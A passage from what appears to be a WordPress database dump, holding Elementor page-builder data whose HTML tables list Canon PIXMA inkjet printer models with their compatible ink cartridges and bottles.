(Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800R<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP810<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP830<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP970<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP988<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP996<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d0130d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fc01984\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6549880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX308<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX328<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX338<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX347<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX366<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX426<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX876<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX886<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-726 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-725 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-1<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-29 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Dark Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Yellow)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7fc065\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"387b65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-10<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-72 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-42 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TR8570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS207<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS307<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5070<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-771 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"736141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e8521a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS8270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9170<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6953,3306,'_elementor_version','2.5.14'),(6956,3307,'_wp_page_template','template-fullwidth.php'),(6957,3307,'_elementor_edit_mode','builder'),(6958,3307,'_elementor_template_type','post'),(6959,3307,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Injet Printers 